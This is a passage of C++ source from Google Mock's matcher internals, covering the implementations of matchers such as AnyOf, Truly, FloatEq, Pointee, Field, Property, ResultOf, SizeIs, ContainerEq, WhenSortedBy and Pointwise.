    const internal::string s2 = listener2.str();

    // Join the two explanations with ", and ", omitting whichever is
    // empty.
    if (s1 == "") {
      *listener << s2;
    } else {
      *listener << s1;
      if (s2 != "") {
        *listener << ", and " << s2;
      }
    }
    return false;
  }

 private:
  const Matcher<T> matcher1_;
  const Matcher<T> matcher2_;

  GTEST_DISALLOW_ASSIGN_(EitherOfMatcherImpl);
};

#if GTEST_LANG_CXX11
// AnyOfMatcher is used for the variadic implementation of
// AnyOf(m_1, m_2, ...).
template <typename... Args>
using AnyOfMatcher = VariadicMatcher<EitherOfMatcherImpl, Args...>;
#endif  // GTEST_LANG_CXX11

// Used for implementing the AnyOf(m_1, ..., m_n) matcher, which
// matches a value that matches at least one of the matchers m_1, ...,
// and m_n.
template <typename Matcher1, typename Matcher2>
class EitherOfMatcher {
 public:
  EitherOfMatcher(Matcher1 matcher1, Matcher2 matcher2)
      : matcher1_(matcher1), matcher2_(matcher2) {}

  // This template type conversion operator allows a
  // EitherOfMatcher<Matcher1, Matcher2> object to match any type that
  // both Matcher1 and Matcher2 can match.
  template <typename T>
  operator Matcher<T>() const {
    return Matcher<T>(new EitherOfMatcherImpl<T>(
        SafeMatcherCast<T>(matcher1_), SafeMatcherCast<T>(matcher2_)));
  }

 private:
  Matcher1 matcher1_;
  Matcher2 matcher2_;

  GTEST_DISALLOW_ASSIGN_(EitherOfMatcher);
};

// Used for implementing Truly(pred), which turns a predicate into a
// matcher.
template <typename Predicate>
class TrulyMatcher {
 public:
  explicit TrulyMatcher(Predicate pred) : predicate_(pred) {}

  // This method template allows Truly(pred) to be used as a matcher
  // for type T where T is the argument type of predicate 'pred'.  The
  // argument is passed by reference as the predicate may be
  // interested in the address of the argument.
  template <typename T>
  bool MatchAndExplain(T& x,  // NOLINT
                       MatchResultListener* /* listener */) const {
    // Without the if-statement, MSVC sometimes warns about converting
    // a value to bool (warning 4800).
    //
    // We cannot write 'return !!predicate_(x);' as that doesn't work
    // when predicate_(x) returns a class convertible to bool but
    // having no operator!().
    if (predicate_(x))
      return true;
    return false;
  }

  void DescribeTo(::std::ostream* os) const {
    *os << "satisfies the given predicate";
  }

  void DescribeNegationTo(::std::ostream* os) const {
    *os << "doesn't satisfy the given predicate";
  }

 private:
  Predicate predicate_;

  GTEST_DISALLOW_ASSIGN_(TrulyMatcher);
};

// Used for implementing Matches(matcher), which turns a matcher into
// a predicate.
template <typename M>
class MatcherAsPredicate {
 public:
  explicit MatcherAsPredicate(M matcher) : matcher_(matcher) {}

  // This template operator() allows Matches(m) to be used as a
  // predicate on type T where m is a matcher on type T.
  //
  // The argument x is passed by reference instead of by value, as
  // some matcher may be interested in its address (e.g. as in
  // Matches(Ref(n))(x)).
  template <typename T>
  bool operator()(const T& x) const {
    // We let matcher_ commit to a particular type here instead of
    // when the MatcherAsPredicate object was constructed.  This
    // allows us to write Matches(m) where m is a polymorphic matcher
    // (e.g. Eq(5)).
    //
    // If we write Matcher<T>(matcher_).Matches(x) here, it won't
    // compile when matcher_ has type Matcher<const T&>; if we write
    // Matcher<const T&>(matcher_).Matches(x) here, it won't compile
    // when matcher_ has type Matcher<T>; if we just write
    // matcher_.Matches(x), it won't compile when matcher_ is
    // polymorphic, e.g. Eq(5).
    //
    // MatcherCast<const T&>() is necessary for making the code work
    // in all of the above situations.
    return MatcherCast<const T&>(matcher_).Matches(x);
  }

 private:
  M matcher_;

  GTEST_DISALLOW_ASSIGN_(MatcherAsPredicate);
};

// For implementing ASSERT_THAT() and EXPECT_THAT().  The template
// argument M must be a type that can be converted to a matcher.
template <typename M>
class PredicateFormatterFromMatcher {
 public:
  explicit PredicateFormatterFromMatcher(const M& m) : matcher_(m) {}

  // This template () operator allows a PredicateFormatterFromMatcher
  // object to act as a predicate-formatter suitable for using with
  // Google Test's EXPECT_PRED_FORMAT1() macro.
  template <typename T>
  AssertionResult operator()(const char* value_text, const T& x) const {
    // We convert matcher_ to a Matcher<const T&> *now* instead of
    // when the PredicateFormatterFromMatcher object was constructed,
    // as matcher_ may be polymorphic (e.g. NotNull()) and we won't
    // know which type to instantiate it to until we actually see the
    // type of x here.
    //
    // We write SafeMatcherCast<const T&>(matcher_) instead of
    // Matcher<const T&>(matcher_), as the latter won't compile when
    // matcher_ has type Matcher<T> (e.g. An<int>()).
    // We don't write MatcherCast<const T&> either, as that allows
    // potentially unsafe downcasting of the matcher argument.
    const Matcher<const T&> matcher = SafeMatcherCast<const T&>(matcher_);
    StringMatchResultListener listener;
    if (MatchPrintAndExplain(x, matcher, &listener))
      return AssertionSuccess();

    ::std::stringstream ss;
    ss << "Value of: " << value_text << "\n"
       << "Expected: ";
    matcher.DescribeTo(&ss);
    ss << "\n  Actual: " << listener.str();
    return AssertionFailure() << ss.str();
  }

 private:
  const M matcher_;

  GTEST_DISALLOW_ASSIGN_(PredicateFormatterFromMatcher);
};

// A helper function for converting a matcher to a predicate-formatter
// without the user needing to explicitly write the type.  This is
// used for implementing ASSERT_THAT() and EXPECT_THAT().
template <typename M>
inline PredicateFormatterFromMatcher<M>
MakePredicateFormatterFromMatcher(const M& matcher) {
  return PredicateFormatterFromMatcher<M>(matcher);
}

// Implements the polymorphic floating point equality matcher, which matches
// two float values using ULP-based approximation or, optionally, a
// user-specified epsilon.  The template is meant to be instantiated with
// FloatType being either float or double.
template <typename FloatType>
class FloatingEqMatcher {
 public:
  // Constructor for FloatingEqMatcher.
  // The matcher's input will be compared with rhs.  The matcher treats two
  // NANs as equal if nan_eq_nan is true.  Otherwise, under IEEE standards,
  // equality comparisons between NANs will always return false.  We specify a
  // negative max_abs_error_ term to indicate that ULP-based approximation will
  // be used for comparison.
  FloatingEqMatcher(FloatType rhs, bool nan_eq_nan)
      : rhs_(rhs), nan_eq_nan_(nan_eq_nan), max_abs_error_(-1) {
  }

  // Constructor that supports a user-specified max_abs_error that will be used
  // for comparison instead of ULP-based approximation.  The max absolute
  // should be non-negative.
  FloatingEqMatcher(FloatType rhs, bool nan_eq_nan, FloatType max_abs_error)
      : rhs_(rhs), nan_eq_nan_(nan_eq_nan), max_abs_error_(max_abs_error) {
    GTEST_CHECK_(max_abs_error >= 0)
        << ", where max_abs_error is" << max_abs_error;
  }

  // Implements floating point equality matcher as a Matcher<T>.
  template <typename T>
  class Impl : public MatcherInterface<T> {
   public:
    Impl(FloatType rhs, bool nan_eq_nan, FloatType max_abs_error)
        : rhs_(rhs), nan_eq_nan_(nan_eq_nan), max_abs_error_(max_abs_error) {}

    virtual bool MatchAndExplain(T value,
                                 MatchResultListener* /* listener */) const {
      const FloatingPoint<FloatType> lhs(value), rhs(rhs_);

      // Compares NaNs first, if nan_eq_nan_ is true.
      if (lhs.is_nan() || rhs.is_nan()) {
        if (lhs.is_nan() && rhs.is_nan()) {
          return nan_eq_nan_;
        }
        // One is nan; the other is not nan.
        return false;
      }
      if (HasMaxAbsError()) {
        // We perform an equality check so that inf will match inf, regardless
        // of error bounds.  If the result of value - rhs_ would result in
        // overflow or if either value is inf, the default result is infinity,
        // which should only match if max_abs_error_ is also infinity.
        // NOTE(review): fabs is called unqualified here -- presumably
        // resolving to the <cmath> overloads via a using-declaration or
        // the global namespace; confirm for non-double FloatType.
        return value == rhs_ || fabs(value - rhs_) <= max_abs_error_;
      } else {
        // ULP-based comparison (see FloatingPoint<>::AlmostEquals).
        return lhs.AlmostEquals(rhs);
      }
    }

    virtual void DescribeTo(::std::ostream* os) const {
      // os->precision() returns the previously set precision, which we
      // store to restore the ostream to its original configuration
      // after outputting.
      const ::std::streamsize old_precision = os->precision(
          ::std::numeric_limits<FloatType>::digits10 + 2);
      if (FloatingPoint<FloatType>(rhs_).is_nan()) {
        if (nan_eq_nan_) {
          *os << "is NaN";
        } else {
          *os << "never matches";
        }
      } else {
        *os << "is approximately " << rhs_;
        if (HasMaxAbsError()) {
          *os << " (absolute error <= " << max_abs_error_ << ")";
        }
      }
      os->precision(old_precision);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      // As before, get original precision.
      const ::std::streamsize old_precision = os->precision(
          ::std::numeric_limits<FloatType>::digits10 + 2);
      if (FloatingPoint<FloatType>(rhs_).is_nan()) {
        if (nan_eq_nan_) {
          *os << "isn't NaN";
        } else {
          *os << "is anything";
        }
      } else {
        *os << "isn't approximately " << rhs_;
        if (HasMaxAbsError()) {
          *os << " (absolute error > " << max_abs_error_ << ")";
        }
      }
      // Restore original precision.
      os->precision(old_precision);
    }

   private:
    bool HasMaxAbsError() const {
      return max_abs_error_ >= 0;
    }

    const FloatType rhs_;
    const bool nan_eq_nan_;
    // max_abs_error will be used for value comparison when >= 0.
    const FloatType max_abs_error_;

    GTEST_DISALLOW_ASSIGN_(Impl);
  };

  // The following 3 type conversion operators allow FloatEq(rhs) and
  // NanSensitiveFloatEq(rhs) to be used as a Matcher<float>, a
  // Matcher<const float&>, or a Matcher<float&>, but nothing else.
  // (While Google's C++ coding style doesn't allow arguments passed
  // by non-const reference, we may see them in code not conforming to
  // the style.  Therefore Google Mock needs to support them.)
  operator Matcher<FloatType>() const {
    return MakeMatcher(new Impl<FloatType>(rhs_, nan_eq_nan_, max_abs_error_));
  }

  operator Matcher<const FloatType&>() const {
    return MakeMatcher(
        new Impl<const FloatType&>(rhs_, nan_eq_nan_, max_abs_error_));
  }

  operator Matcher<FloatType&>() const {
    return MakeMatcher(new Impl<FloatType&>(rhs_, nan_eq_nan_, max_abs_error_));
  }

 private:
  const FloatType rhs_;
  const bool nan_eq_nan_;
  // max_abs_error will be used for value comparison when >= 0.
  const FloatType max_abs_error_;

  GTEST_DISALLOW_ASSIGN_(FloatingEqMatcher);
};

// Implements the Pointee(m) matcher for matching a pointer whose
// pointee matches matcher m.  The pointer can be either raw or smart.
template <typename InnerMatcher>
class PointeeMatcher {
 public:
  explicit PointeeMatcher(const InnerMatcher& matcher) : matcher_(matcher) {}

  // This type conversion operator template allows Pointee(m) to be
  // used as a matcher for any pointer type whose pointee type is
  // compatible with the inner matcher, where type Pointer can be
  // either a raw pointer or a smart pointer.
  //
  // The reason we do this instead of relying on
  // MakePolymorphicMatcher() is that the latter is not flexible
  // enough for implementing the DescribeTo() method of Pointee().
  template <typename Pointer>
  operator Matcher<Pointer>() const {
    return MakeMatcher(new Impl<Pointer>(matcher_));
  }

 private:
  // The monomorphic implementation that works for a particular pointer type.
  template <typename Pointer>
  class Impl : public MatcherInterface<Pointer> {
   public:
    typedef typename PointeeOf<GTEST_REMOVE_CONST_(  // NOLINT
        GTEST_REMOVE_REFERENCE_(Pointer))>::type Pointee;

    explicit Impl(const InnerMatcher& matcher)
        : matcher_(MatcherCast<const Pointee&>(matcher)) {}

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "points to a value that ";
      matcher_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "does not point to a value that ";
      matcher_.DescribeTo(os);
    }

    // A NULL pointer never matches, whatever the inner matcher is.
    virtual bool MatchAndExplain(Pointer pointer,
                                 MatchResultListener* listener) const {
      if (GetRawPointer(pointer) == NULL)
        return false;

      *listener << "which points to ";
      return MatchPrintAndExplain(*pointer, matcher_, listener);
    }

   private:
    const Matcher<const Pointee&> matcher_;

    GTEST_DISALLOW_ASSIGN_(Impl);
  };

  const InnerMatcher matcher_;

  GTEST_DISALLOW_ASSIGN_(PointeeMatcher);
};

// Implements the Field() matcher for matching a field (i.e. member
// variable) of an object.
template <typename Class, typename FieldType>
class FieldMatcher {
 public:
  FieldMatcher(FieldType Class::*field,
               const Matcher<const FieldType&>& matcher)
      : field_(field), matcher_(matcher) {}

  void DescribeTo(::std::ostream* os) const {
    *os << "is an object whose given field ";
    matcher_.DescribeTo(os);
  }

  void DescribeNegationTo(::std::ostream* os) const {
    *os << "is an object whose given field ";
    matcher_.DescribeNegationTo(os);
  }

  // Dispatches on whether T is a pointer or an object; both
  // Field(&C::f, m).Matches(obj) and Field(&C::f, m).Matches(&obj)
  // are supported.
  template <typename T>
  bool MatchAndExplain(const T& value, MatchResultListener* listener) const {
    return MatchAndExplainImpl(
        typename ::testing::internal::
            is_pointer<GTEST_REMOVE_CONST_(T)>::type(),
        value, listener);
  }

 private:
  // The first argument of MatchAndExplainImpl() is needed to help
  // Symbian's C++ compiler choose which overload to use.  Its type is
  // true_type iff the Field() matcher is used to match a pointer.
  bool MatchAndExplainImpl(false_type /* is_not_pointer */, const Class& obj,
                           MatchResultListener* listener) const {
    *listener << "whose given field is ";
    return MatchPrintAndExplain(obj.*field_, matcher_, listener);
  }

  bool MatchAndExplainImpl(true_type /* is_pointer */, const Class* p,
                           MatchResultListener* listener) const {
    if (p == NULL)
      return false;

    *listener << "which points to an object ";
    // Since *p has a field, it must be a class/struct/union type and
    // thus cannot be a pointer.  Therefore we pass false_type() as
    // the first argument.
    return MatchAndExplainImpl(false_type(), *p, listener);
  }

  const FieldType Class::*field_;
  const Matcher<const FieldType&> matcher_;

  GTEST_DISALLOW_ASSIGN_(FieldMatcher);
};

// Implements the Property() matcher for matching a property
// (i.e. return value of a getter method) of an object.
template <typename Class, typename PropertyType>
class PropertyMatcher {
 public:
  // The property may have a reference type, so 'const PropertyType&'
  // may cause double references and fail to compile.  That's why we
  // need GTEST_REFERENCE_TO_CONST, which works regardless of
  // PropertyType being a reference or not.
  typedef GTEST_REFERENCE_TO_CONST_(PropertyType) RefToConstProperty;

  PropertyMatcher(PropertyType (Class::*property)() const,
                  const Matcher<RefToConstProperty>& matcher)
      : property_(property), matcher_(matcher) {}

  void DescribeTo(::std::ostream* os) const {
    *os << "is an object whose given property ";
    matcher_.DescribeTo(os);
  }

  void DescribeNegationTo(::std::ostream* os) const {
    *os << "is an object whose given property ";
    matcher_.DescribeNegationTo(os);
  }

  // Dispatches on whether T is a pointer or an object, like
  // FieldMatcher::MatchAndExplain above.
  template <typename T>
  bool MatchAndExplain(const T& value, MatchResultListener* listener) const {
    return MatchAndExplainImpl(
        typename ::testing::internal::
            is_pointer<GTEST_REMOVE_CONST_(T)>::type(),
        value, listener);
  }

 private:
  // The first argument of MatchAndExplainImpl() is needed to help
  // Symbian's C++ compiler choose which overload to use.  Its type is
  // true_type iff the Property() matcher is used to match a pointer.
  bool MatchAndExplainImpl(false_type /* is_not_pointer */, const Class& obj,
                           MatchResultListener* listener) const {
    *listener << "whose given property is ";
    // Cannot pass the return value (for example, int) to MatchPrintAndExplain,
    // which takes a non-const reference as argument.
    RefToConstProperty result = (obj.*property_)();
    return MatchPrintAndExplain(result, matcher_, listener);
  }

  bool MatchAndExplainImpl(true_type /* is_pointer */, const Class* p,
                           MatchResultListener* listener) const {
    if (p == NULL)
      return false;

    *listener << "which points to an object ";
    // Since *p has a property method, it must be a class/struct/union
    // type and thus cannot be a pointer.  Therefore we pass
    // false_type() as the first argument.
    return MatchAndExplainImpl(false_type(), *p, listener);
  }

  PropertyType (Class::*property_)() const;
  const Matcher<RefToConstProperty> matcher_;

  GTEST_DISALLOW_ASSIGN_(PropertyMatcher);
};

// Type traits specifying various features of different functors for ResultOf.
// The default template specifies features for functor objects.
// Functor classes have to typedef argument_type and result_type
// to be compatible with ResultOf.
template <typename Functor>
struct CallableTraits {
  typedef typename Functor::result_type ResultType;
  typedef Functor StorageType;

  static void CheckIsValid(Functor /* functor */) {}
  template <typename T>
  static ResultType Invoke(Functor f, T arg) { return f(arg); }
};

// Specialization for function pointers.
template <typename ArgType, typename ResType>
struct CallableTraits<ResType(*)(ArgType)> {
  typedef ResType ResultType;
  typedef ResType(*StorageType)(ArgType);

  // A NULL function pointer cannot be invoked; reject it eagerly at
  // matcher-construction time rather than at match time.
  static void CheckIsValid(ResType(*f)(ArgType)) {
    GTEST_CHECK_(f != NULL)
        << "NULL function pointer is passed into ResultOf().";
  }
  template <typename T>
  static ResType Invoke(ResType(*f)(ArgType), T arg) {
    return (*f)(arg);
  }
};

// Implements the ResultOf() matcher for matching a return value of a
// unary function of an object.
template <typename Callable>
class ResultOfMatcher {
 public:
  typedef typename CallableTraits<Callable>::ResultType ResultType;

  ResultOfMatcher(Callable callable, const Matcher<ResultType>& matcher)
      : callable_(callable), matcher_(matcher) {
    CallableTraits<Callable>::CheckIsValid(callable_);
  }

  // Allows ResultOf(f, m) to be used as a Matcher<T> for any argument
  // type T that the callable accepts.
  template <typename T>
  operator Matcher<T>() const {
    return Matcher<T>(new Impl<T>(callable_, matcher_));
  }

 private:
  typedef typename CallableTraits<Callable>::StorageType CallableStorageType;

  template <typename T>
  class Impl : public MatcherInterface<T> {
   public:
    Impl(CallableStorageType callable, const Matcher<ResultType>& matcher)
        : callable_(callable), matcher_(matcher) {}

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "is mapped by the given callable to a value that ";
      matcher_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "is mapped by the given callable to a value that ";
      matcher_.DescribeNegationTo(os);
    }

    virtual bool MatchAndExplain(T obj, MatchResultListener* listener) const {
      *listener << "which is mapped by the given callable to ";
      // Cannot pass the return value (for example, int) to
      // MatchPrintAndExplain, which takes a non-const reference as argument.
      ResultType result =
          CallableTraits<Callable>::template Invoke<T>(callable_, obj);
      return MatchPrintAndExplain(result, matcher_, listener);
    }

   private:
    // Functors often define operator() as non-const method even though
    // they are actualy stateless.  But we need to use them even when
    // 'this' is a const pointer.  It's the user's responsibility not to
    // use stateful callables with ResultOf(), which does't guarantee
    // how many times the callable will be invoked.
    mutable CallableStorageType callable_;
    const Matcher<ResultType> matcher_;

    GTEST_DISALLOW_ASSIGN_(Impl);
  };  // class Impl

  const CallableStorageType callable_;
  const Matcher<ResultType> matcher_;

  GTEST_DISALLOW_ASSIGN_(ResultOfMatcher);
};

// Implements a matcher that checks the size of an STL-style container.
template <typename SizeMatcher>
class SizeIsMatcher {
 public:
  explicit SizeIsMatcher(const SizeMatcher& size_matcher)
      : size_matcher_(size_matcher) {
  }

  template <typename Container>
  operator Matcher<Container>() const {
    return MakeMatcher(new Impl<Container>(size_matcher_));
  }

  template <typename Container>
  class Impl : public MatcherInterface<Container> {
   public:
    typedef internal::StlContainerView<
        GTEST_REMOVE_REFERENCE_AND_CONST_(Container)> ContainerView;
    typedef typename ContainerView::type::size_type SizeType;
    explicit Impl(const SizeMatcher& size_matcher)
        : size_matcher_(MatcherCast<SizeType>(size_matcher)) {}

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "size ";
      size_matcher_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "size ";
      size_matcher_.DescribeNegationTo(os);
    }

    virtual bool MatchAndExplain(Container container,
                                 MatchResultListener* listener) const {
      SizeType size = container.size();
      StringMatchResultListener size_listener;
      const bool result = size_matcher_.MatchAndExplain(size, &size_listener);
      *listener
          << "whose size " << size << (result ? " matches" : " doesn't match");
      // Forward the inner matcher's explanation, if any.
      PrintIfNotEmpty(size_listener.str(), listener->stream());
      return result;
    }

   private:
    const Matcher<SizeType> size_matcher_;
    GTEST_DISALLOW_ASSIGN_(Impl);
  };

 private:
  const SizeMatcher size_matcher_;
  GTEST_DISALLOW_ASSIGN_(SizeIsMatcher);
};

// Implements a matcher that checks the begin()..end() distance of an STL-style
// container.
template <typename DistanceMatcher>
class BeginEndDistanceIsMatcher {
 public:
  explicit BeginEndDistanceIsMatcher(const DistanceMatcher& distance_matcher)
      : distance_matcher_(distance_matcher) {}

  template <typename Container>
  operator Matcher<Container>() const {
    return MakeMatcher(new Impl<Container>(distance_matcher_));
  }

  template <typename Container>
  class Impl : public MatcherInterface<Container> {
   public:
    typedef internal::StlContainerView<
        GTEST_REMOVE_REFERENCE_AND_CONST_(Container)> ContainerView;
    typedef typename std::iterator_traits<
        typename ContainerView::type::const_iterator>::difference_type
        DistanceType;
    explicit Impl(const DistanceMatcher& distance_matcher)
        : distance_matcher_(MatcherCast<DistanceType>(distance_matcher)) {}

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "distance between begin() and end() ";
      distance_matcher_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "distance between begin() and end() ";
      distance_matcher_.DescribeNegationTo(os);
    }

    virtual bool MatchAndExplain(Container container,
                                 MatchResultListener* listener) const {
#if GTEST_LANG_CXX11
      // ADL via the using-declarations picks up free begin()/end()
      // for containers that provide them as non-members.
      using std::begin;
      using std::end;
      DistanceType distance = std::distance(begin(container), end(container));
#else
      DistanceType distance = std::distance(container.begin(), container.end());
#endif
      StringMatchResultListener distance_listener;
      const bool result =
          distance_matcher_.MatchAndExplain(distance, &distance_listener);
      *listener << "whose distance between begin() and end() " << distance
                << (result ? " matches" : " doesn't match");
      // Forward the inner matcher's explanation, if any.
      PrintIfNotEmpty(distance_listener.str(), listener->stream());
      return result;
    }

   private:
    const Matcher<DistanceType> distance_matcher_;
    GTEST_DISALLOW_ASSIGN_(Impl);
  };

 private:
  const DistanceMatcher distance_matcher_;
  GTEST_DISALLOW_ASSIGN_(BeginEndDistanceIsMatcher);
};

// Implements an equality matcher for any STL-style container whose elements
// support ==. This matcher is like Eq(), but its failure explanations provide
// more detailed information that is useful when the container is used as a set.
// The failure message reports elements that are in one of the operands but not
// the other. The failure messages do not report duplicate or out-of-order
// elements in the containers (which don't properly matter to sets, but can
// occur if the containers are vectors or lists, for example).
//
// Uses the container's const_iterator, value_type, operator ==,
// begin(), and end().
template <typename Container>
class ContainerEqMatcher {
 public:
  typedef internal::StlContainerView<Container> View;
  typedef typename View::type StlContainer;
  typedef typename View::const_reference StlContainerReference;

  // We make a copy of rhs in case the elements in it are modified
  // after this matcher is created.
  explicit ContainerEqMatcher(const Container& rhs) : rhs_(View::Copy(rhs)) {
    // Makes sure the user doesn't instantiate this class template
    // with a const or reference type.
    (void)testing::StaticAssertTypeEq<Container,
        GTEST_REMOVE_REFERENCE_AND_CONST_(Container)>();
  }

  void DescribeTo(::std::ostream* os) const {
    *os << "equals ";
    UniversalPrint(rhs_, os);
  }
  void DescribeNegationTo(::std::ostream* os) const {
    *os << "does not equal ";
    UniversalPrint(rhs_, os);
  }

  template <typename LhsContainer>
  bool MatchAndExplain(const LhsContainer& lhs,
                       MatchResultListener* listener) const {
    // GTEST_REMOVE_CONST_() is needed to work around an MSVC 8.0 bug
    // that causes LhsContainer to be a const type sometimes.
    typedef internal::StlContainerView<GTEST_REMOVE_CONST_(LhsContainer)>
        LhsView;
    typedef typename LhsView::type LhsStlContainer;
    StlContainerReference lhs_stl_container = LhsView::ConstReference(lhs);
    if (lhs_stl_container == rhs_)
      return true;

    // Explanations are only produced when the listener is actually
    // interested (has a stream).
    ::std::ostream* const os = listener->stream();
    if (os != NULL) {
      // Something is different. Check for extra values first.
      bool printed_header = false;
      for (typename LhsStlContainer::const_iterator it =
               lhs_stl_container.begin();
           it != lhs_stl_container.end(); ++it) {
        if (internal::ArrayAwareFind(rhs_.begin(), rhs_.end(), *it) ==
            rhs_.end()) {
          if (printed_header) {
            *os << ", ";
          } else {
            *os << "which has these unexpected elements: ";
            printed_header = true;
          }
          UniversalPrint(*it, os);
        }
      }

      // Now check for missing values.
      bool printed_header2 = false;
      for (typename StlContainer::const_iterator it = rhs_.begin();
           it != rhs_.end(); ++it) {
        if (internal::ArrayAwareFind(
                lhs_stl_container.begin(), lhs_stl_container.end(), *it) ==
            lhs_stl_container.end()) {
          if (printed_header2) {
            *os << ", ";
          } else {
            *os << (printed_header ? ",\nand" : "which")
                << " doesn't have these expected elements: ";
            printed_header2 = true;
          }
          UniversalPrint(*it, os);
        }
      }
    }

    return false;
  }

 private:
  const StlContainer rhs_;

  GTEST_DISALLOW_ASSIGN_(ContainerEqMatcher);
};

// A comparator functor that uses the < operator to compare two values.
struct LessComparator {
  template <typename T, typename U>
  bool operator()(const T& lhs, const U& rhs) const { return lhs < rhs; }
};

// Implements WhenSortedBy(comparator, container_matcher).
template <typename Comparator, typename ContainerMatcher>
class WhenSortedByMatcher {
 public:
  WhenSortedByMatcher(const Comparator& comparator,
                      const ContainerMatcher& matcher)
      : comparator_(comparator), matcher_(matcher) {}

  template <typename LhsContainer>
  operator Matcher<LhsContainer>() const {
    return MakeMatcher(new Impl<LhsContainer>(comparator_, matcher_));
  }

  template <typename LhsContainer>
  class Impl : public MatcherInterface<LhsContainer> {
   public:
    typedef internal::StlContainerView<
         GTEST_REMOVE_REFERENCE_AND_CONST_(LhsContainer)> LhsView;
    typedef typename LhsView::type LhsStlContainer;
    typedef typename LhsView::const_reference LhsStlContainerReference;
    // Transforms std::pair<const Key, Value> into std::pair<Key, Value>
    // so that we can match associative containers.
    typedef typename RemoveConstFromKey<
        typename LhsStlContainer::value_type>::type LhsValue;

    Impl(const Comparator& comparator, const ContainerMatcher& matcher)
        : comparator_(comparator), matcher_(matcher) {}

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "(when sorted) ";
      matcher_.DescribeTo(os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "(when sorted) ";
      matcher_.DescribeNegationTo(os);
    }

    // Copies the elements into a vector, sorts them with the user-supplied
    // comparator, and then runs the inner container matcher on the sorted
    // copy.  The original container is never modified.
    virtual bool MatchAndExplain(LhsContainer lhs,
                                 MatchResultListener* listener) const {
      LhsStlContainerReference lhs_stl_container = LhsView::ConstReference(lhs);
      ::std::vector<LhsValue> sorted_container(lhs_stl_container.begin(),
                                               lhs_stl_container.end());
      ::std::sort(
           sorted_container.begin(), sorted_container.end(), comparator_);

      if (!listener->IsInterested()) {
        // If the listener is not interested, we do not need to
        // construct the inner explanation.
        return matcher_.Matches(sorted_container);
      }

      *listener << "which is ";
      UniversalPrint(sorted_container, listener->stream());
      *listener << " when sorted";

      StringMatchResultListener inner_listener;
      const bool match = matcher_.MatchAndExplain(sorted_container,
                                                  &inner_listener);
      PrintIfNotEmpty(inner_listener.str(), listener->stream());
      return match;
    }

   private:
    const Comparator comparator_;
    // Inner matcher is monomorphized against the sorted vector type.
    const Matcher<const ::std::vector<LhsValue>&> matcher_;

    GTEST_DISALLOW_COPY_AND_ASSIGN_(Impl);
  };

 private:
  const Comparator comparator_;
  const ContainerMatcher matcher_;

  GTEST_DISALLOW_ASSIGN_(WhenSortedByMatcher);
};

// Implements Pointwise(tuple_matcher, rhs_container).  tuple_matcher
// must be able to be safely cast to Matcher<tuple<const T1&, const
// T2&> >, where T1 and T2 are the types of elements in the LHS
// container and the RHS container respectively.
template <typename TupleMatcher, typename RhsContainer>
class PointwiseMatcher {
 public:
  typedef internal::StlContainerView<RhsContainer> RhsView;
  typedef typename RhsView::type RhsStlContainer;
  typedef typename RhsStlContainer::value_type RhsValue;

  // Like ContainerEq, we make a copy of rhs in case the elements in
  // it are modified after this matcher is created.
  PointwiseMatcher(const TupleMatcher& tuple_matcher, const RhsContainer& rhs)
      : tuple_matcher_(tuple_matcher), rhs_(RhsView::Copy(rhs)) {
    // Makes sure the user doesn't instantiate this class template
    // with a const or reference type.
    (void)testing::StaticAssertTypeEq<RhsContainer,
        GTEST_REMOVE_REFERENCE_AND_CONST_(RhsContainer)>();
  }

  template <typename LhsContainer>
  operator Matcher<LhsContainer>() const {
    return MakeMatcher(new Impl<LhsContainer>(tuple_matcher_, rhs_));
  }

  template <typename LhsContainer>
  class Impl : public MatcherInterface<LhsContainer> {
   public:
    typedef internal::StlContainerView<
         GTEST_REMOVE_REFERENCE_AND_CONST_(LhsContainer)> LhsView;
    typedef typename LhsView::type LhsStlContainer;
    typedef typename LhsView::const_reference LhsStlContainerReference;
    typedef typename LhsStlContainer::value_type LhsValue;
    // We pass the LHS value and the RHS value to the inner matcher by
    // reference, as they may be expensive to copy.  We must use tuple
    // instead of pair here, as a pair cannot hold references (C++ 98,
    // 20.2.2 [lib.pairs]).
    typedef ::testing::tuple<const LhsValue&, const RhsValue&> InnerMatcherArg;

    Impl(const TupleMatcher& tuple_matcher, const RhsStlContainer& rhs)
        // mono_tuple_matcher_ holds a monomorphic version of the tuple matcher.
        : mono_tuple_matcher_(SafeMatcherCast<InnerMatcherArg>(tuple_matcher)),
          rhs_(rhs) {}

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "contains " << rhs_.size()
          << " values, where each value and its corresponding value in ";
      UniversalPrinter<RhsStlContainer>::Print(rhs_, os);
      *os << " ";
      mono_tuple_matcher_.DescribeTo(os);
    }
    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "doesn't contain exactly " << rhs_.size()
          << " values, or contains a value x at some index i"
          << " where x and the i-th value of ";
      UniversalPrint(rhs_, os);
      *os << " ";
      mono_tuple_matcher_.DescribeNegationTo(os);
    }

    // Matches iff lhs has exactly rhs_.size() elements and every
    // (lhs[i], rhs[i]) pair satisfies the tuple matcher.
    virtual bool MatchAndExplain(LhsContainer lhs,
                                 MatchResultListener* listener) const {
      LhsStlContainerReference lhs_stl_container = LhsView::ConstReference(lhs);
      const size_t actual_size = lhs_stl_container.size();
      if (actual_size != rhs_.size()) {
        *listener << "which contains " << actual_size << " values";
        return false;
      }

      typename LhsStlContainer::const_iterator left = lhs_stl_container.begin();
      typename RhsStlContainer::const_iterator right = rhs_.begin();
      for (size_t i = 0; i != actual_size; ++i, ++left, ++right) {
        const InnerMatcherArg value_pair(*left, *right);

        if (listener->IsInterested()) {
          StringMatchResultListener inner_listener;
          if (!mono_tuple_matcher_.MatchAndExplain(
                  value_pair, &inner_listener)) {
            *listener << "where the value pair (";
            UniversalPrint(*left, listener->stream());
            *listener << ", ";
            UniversalPrint(*right, listener->stream());
            *listener << ") at index #" << i << " don't match";
            PrintIfNotEmpty(inner_listener.str(), listener->stream());
            return false;
          }
        } else {
          if (!mono_tuple_matcher_.Matches(value_pair))
            return false;
        }
      }

      return true;
    }

   private:
